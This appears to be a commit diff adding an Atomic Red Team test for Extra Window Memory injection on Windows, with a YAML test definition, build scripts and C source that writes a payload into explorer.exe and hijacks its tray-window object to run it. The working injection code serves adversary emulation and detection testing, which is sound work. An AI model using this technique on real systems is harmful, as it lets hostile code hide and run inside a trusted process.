T1055.011 - Process Injection: Extra Window Memory Injection (#2539)

* Updated .gitignore with more files to be ignored

* Working T1055.011 x64 payload. WIP x86

* Fixed a bug executing from Invoke-AtomicTest. x86 WIP

* Update T1055.011.yaml

Removed autogenerated_guid

---------

Co-authored-by: Hare Sudhan <[email protected]>

.gitignore

@@ -61,3 +61,91 @@ terraform.rc
 
 # The ExternalPayloads folder
 ExternalPayloads
+
+# Visual Studio 2015/2017 cache/options directory
+.vs/
+
+# .NET Core
+project.lock.json
+project.fragment.lock.json
+artifacts/
+
+# ASP.NET Scaffolding
+ScaffoldingReadMe.txt
+
+# StyleCop
+StyleCopReport.xml
+
+# Files built by Visual Studio
+*_i.c
+*_p.c
+*_h.h
+*.ilk
+*.meta
+*.obj
+*.iobj
+*.pch
+*.pdb
+*.ipdb
+*.pgc
+*.pgd
+*.rsp
+*.sbr
+*.tlb
+*.tli
+*.tlh
+*.tmp
+*.tmp_proj
+*_wpftmp.csproj
+*.log
+*.tlog
+*.vspscc
+*.vssscc
+.builds
+*.pidb
+*.svclog
+*.scc
+
+# Visual C++ cache files
+ipch/
+*.aps
+*.ncb
+*.opendb
+*.opensdf
+*.sdf
+*.cachefile
+*.VC.db
+*.VC.VC.opendb
+
+# Visual Studio profiler
+*.psess
+*.vsp
+*.vspx
+*.sap
+
+# Visual Studio Trace Files
+*.e2e
+
+# Visual Studio cache files
+# files ending in .cache can be ignored
+*.[Cc]ache
+# but keep track of directories ending in .cache
+!?*.[Cc]ache/
+
+# Others
+ClientBin/
+~$*
+*~
+*.dbmdl
+*.dbproj.schemaview
+*.jfm
+*.pfx
+*.publishsettings
+orleans.codegen.cs
+
+# Node.js
+node_modules/
+
+# Python
+__pycache__/
+*.pyc

atomics/T1055.011/T1055.011.yaml

@@ -0,0 +1,37 @@
+attack_technique: T1055.011
+display_name: "Process Injection: Extra Window Memory Injection"
+atomic_tests:
+  - name: Process Injection via Extra Window Memory (EWM) x64 executable
+    description: Hooks functions of main process to inject a payload via Extra Window Memory (EWM) injection technique
+    supported_platforms:
+      - windows
+    input_arguments:
+      arch:
+        description: Architecture of payload
+        type: string
+        default: x64
+        choices:
+          - x64
+          - x86
+      exe_binary:
+        description: PE binary for EWM injection
+        type: path
+        default: PathToAtomicsFolder\T1055.011\bin\T1055.011_#{arch}.exe
+      payload_file:
+        description: raw payload to inject
+        type: path
+        default: PathToAtomicsFolder\T1055.011\bin\payload.exe_#{arch}.bin
+    dependency_executor_name: powershell
+    dependencies:
+      - description: "T1055.011x64.exe and payload must exist on disk at specified location (#{exe_binary} and #{payload_file})"
+        prereq_command: "if (Test-Path #{exe_binary}) {exit 0} else {exit 1}"
+        get_prereq_command: |-
+          New-Item -Type Directory (split-path #{exe_binary}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055.011/bin/T1055.011_#{arch}.exe" -OutFile "#{exe_binary}" -UseBasicParsing
+          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055.011/bin/payload.exe_#{arch}.bin" -OutFile "#{payload_file}" -UseBasicParsing
+    executor:
+      command: |-
+        #{exe_binary}
+      cleanup_command: 'Get-Process -Name Notepad -ErrorAction SilentlyContinue | Stop-Process -Force'
+      name: powershell
+      elevation_required: false

atomics/T1055.011/src/build_x64.bat

@@ -0,0 +1,21 @@
+@echo off
+
+rem compiling xbin
+cl -nologo -Os xbin.cpp
+move /Y xbin.exe ..\bin\xbin.exe
+
+rem x64 version
+cl -DWINDOW -D_WIN64 -D_MSC_VER -c -nologo -Os -O2 -Gm- -GR- -EHa -Oi -GS- -w payload.c
+link /order:@extrabytes_x64.txt /entry:WndProc /fixed payload.obj -nologo -subsystem:console -nodefaultlib -stack:0x100000,0x100000
+..\bin\xbin.exe payload.exe .text
+
+echo "Compiling T1055.011_x64.exe"
+cl -DWINDOW -D_WIN64 -D_MSC_VER -nologo -Os -O2 -Gm- -GR- -EHa -Oi -GS- -w ewm.c
+
+ren ewm.exe T1055.011_x64.exe
+move /Y T1055.011_x64.exe ..\bin\
+move /Y payload.exe64.bin ..\bin\payload.exe_x64.bin
+
+echo "Cleaning files"
+del /Q *.obj
+del /Q *.exe

atomics/T1055.011/src/build_x86.bat

@@ -0,0 +1,21 @@
+@echo off
+
+rem compiling xbin
+cl -nologo -Os xbin.cpp
+move /Y xbin.exe ..\bin\xbin.exe
+
+rem x86 version
+cl -DWINDOW -c -nologo -Os -O2 -Gm- -GR- -EHa -Oi -GS- -w payload.c
+link /order:@extrabytes_x86.txt /entry:WndProc /base:0 payload.obj -nologo -subsystem:console -nodefaultlib -stack:0x100000,0x100000
+..\bin\xbin.exe payload.exe .text
+
+echo "Compiling T1055.011_x86.exe"
+cl -DWINDOW -nologo -Os -O2 -Gm- -GR- -EHa -Oi -GS- -w ewm.c
+
+ren ewm.exe T1055.011_x86.exe
+move /Y T1055.011_x86.exe ..\bin\
+move /Y payload.exe32.bin ..\bin\payload.exe_x86.bin
+
+echo "Cleaning files"
+del /Q *.obj
+del /Q *.exe

atomics/T1055.011/src/ewm.c

@@ -0,0 +1,156 @@
+/**
+  Copyright © 2018 Odzhan. All Rights Reserved.
+
+  Redistribution and use in source and binary forms, with or without
+  modification, are permitted provided that the following conditions are
+  met:
+
+  1. Redistributions of source code must retain the above copyright
+  notice, this list of conditions and the following disclaimer.
+
+  2. Redistributions in binary form must reproduce the above copyright
+  notice, this list of conditions and the following disclaimer in the
+  documentation and/or other materials provided with the distribution.
+
+  3. The name of the author may not be used to endorse or promote products
+  derived from this software without specific prior written permission.
+
+  THIS SOFTWARE IS PROVIDED BY AUTHORS "AS IS" AND ANY EXPRESS OR
+  IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
+  WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
+  DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT,
+  INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
+  (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+  SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+  HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+  STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
+  ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
+  POSSIBILITY OF SUCH DAMAGE. */
+
+// Original: https://github.com/odzhan/injection
+
+#define WIN32_LEAN_AND_MEAN
+
+#include "ntlib/nttpp.h"
+#include "ntlib/util.h"
+#include "ewm.h"
+
+#include <evntrace.h>
+#include <pla.h>
+#include <wbemidl.h>
+#include <wmistr.h>
+#include <evntcons.h>
+
+LPVOID ewm(LPVOID payload, DWORD payloadSize){
+    LPVOID    cs, ds;
+    CTray     ct;
+    ULONG_PTR ctp;
+    HWND      hw;
+    HANDLE    hp;
+    DWORD     pid;
+    SIZE_T    wr;
+
+    // 1. Obtain a handle for the shell tray window
+    hw = FindWindow("Shell_TrayWnd", NULL);
+
+    // 2. Obtain a process id for explorer.exe
+    GetWindowThreadProcessId(hw, &pid);
+
+    // 3. Open explorer.exe
+    hp = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
+
+    // 4. Obtain pointer to the current CTray object
+    ctp = GetWindowLongPtr(hw, 0);
+    if (ctp == 0)
+    {
+        printf("GetWindowLongPtr failed!\n");
+        CloseHandle(hp);
+        return;
+    }
+
+    // 5. Read address of the current CTray object
+    ReadProcessMemory(hp, (LPVOID)ctp, (LPVOID)&ct.vTable, sizeof(ULONG_PTR), &wr);
+
+    // 6. Read three addresses from the virtual table
+    ReadProcessMemory(hp, (LPVOID)ct.vTable, (LPVOID)&ct.AddRef, sizeof(ULONG_PTR) * 3, &wr);
+
+    // 7. Allocate RWX memory for code
+    cs = VirtualAllocEx(hp, NULL, payloadSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
+
+    // 8. Copy the code to target process
+    WriteProcessMemory(hp, cs, payload, payloadSize, &wr);
+
+    // 9. Allocate RW memory for the new CTray object
+    ds = VirtualAllocEx(hp, NULL, sizeof(ct), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
+
+    // 10. Write the new CTray object to remote memory
+    ct.vTable  = (ULONG_PTR)ds + sizeof(ULONG_PTR);
+    ct.WndProc = (ULONG_PTR)cs;
+
+    WriteProcessMemory(hp, ds, &ct, sizeof(ct), &wr); 
+
+    // 11. Set the new pointer to CTray object
+    SetWindowLongPtr(hw, 0, (ULONG_PTR)ds);
+    if (SetWindowLongPtr(hw, 0, (ULONG_PTR)ds) == 0) 
+    {
+        printf("SetWindowLongPtr failed!\n");
+        VirtualFreeEx(hp, cs, 0, MEM_DECOMMIT);
+        VirtualFreeEx(hp, ds, 0, MEM_DECOMMIT);
+        CloseHandle(hp);
+        return;
+    }
+
+    // 12. Trigger the payload via a windows message
+    PostMessage(hw, WM_CLOSE, 0, 0);
+
+    Sleep(1);
+
+    // 13. Restore the original CTray object
+    SetWindowLongPtr(hw, 0, ctp);
+
+    // 14. Release memory and close handles
+    VirtualFreeEx(hp, cs, 0, MEM_DECOMMIT | MEM_RELEASE);
+    VirtualFreeEx(hp, ds, 0, MEM_DECOMMIT | MEM_RELEASE);
+
+    CloseHandle(hp);
+}
+
+int main(void) {
+  LPVOID payload = NULL;
+  DWORD  payloadSize = 0;
+
+  PVOID imageBase = GetModuleHandle(NULL);
+  char fullpath[MAX_PATH];
+  char drive[MAX_PATH];
+  char dir[MAX_PATH];
+	if (imageBase != NULL)
+	{
+        if (GetModuleFileName((HMODULE)imageBase, fullpath, sizeof(fullpath)) != 0)
+	    {
+            printf("This program is running from: %s\n", fullpath);
+	    }
+	}
+
+  // Split fullpath into directory and filename
+  _splitpath_s(fullpath, drive, MAX_PATH, dir, MAX_PATH, NULL, 0, NULL, 0);
+
+  // Create fullpath to payload
+  #if defined(_WIN64)
+    sprintf_s(fullpath, MAX_PATH, "%s%s%s", drive, dir, "payload.exe_x64.bin");
+  #else
+    sprintf_s(fullpath, MAX_PATH, "%s%s%s", drive, dir, "payload.exe_x86.bin");
+  #endif
+
+  // Read payload from disk
+  #if defined(_WIN64)
+    payloadSize = readpic(fullpath, &payload);
+  #else
+    payloadSize = readpic(fullpath, &payload);
+  #endif
+  if (payloadSize == 0) { printf("invalid payload\n"); return 0; }
+
+  // Executes payload usin Extra Window Memory Injection (T1055.011)
+  ewm(payload, payloadSize);
+
+  return 0;
+}

atomics/T1055.011/src/ewm.h

@@ -0,0 +1,12 @@
+// Source: https://github.com/odzhan/injection
+#pragma once
+
+// CTray object for Shell_TrayWnd
+typedef struct _ctray_vtable {
+    ULONG_PTR vTable;    // change to remote memory address
+    ULONG_PTR AddRef;
+    ULONG_PTR Release;
+    ULONG_PTR WndProc;   // window procedure (change to payload)
+} CTray;
+
+DWORD readpic(PWCHAR path, LPVOID* pic);

atomics/T1055.011/src/extrabytes_x64.txt

@@ -0,0 +1,4 @@
+WndProc
+FindExport
+xGetProcAddress
+xstrcmp

atomics/T1055.011/src/extrabytes_x86.txt

@@ -0,0 +1,4 @@
+WndProc@16
+FindExport
+xGetProcAddress
+xstrcmp